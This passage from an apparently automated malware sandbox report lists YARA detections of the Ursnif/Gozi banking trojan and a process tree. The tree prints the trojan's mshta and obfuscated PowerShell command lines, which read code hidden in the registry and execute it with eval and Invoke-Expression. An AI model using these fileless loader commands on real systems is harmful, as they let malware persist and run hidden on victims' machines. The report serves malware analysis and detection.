                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:14
                          Start time:02:14:57
                          Start date:16/11/2022
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7e7b90000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:15
                          Start time:02:14:59
                          Start date:16/11/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                          Imagebase:0x7ff6ce4b0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:16
                          Start time:02:14:59
                          Start date:16/11/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff745070000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          No disassembly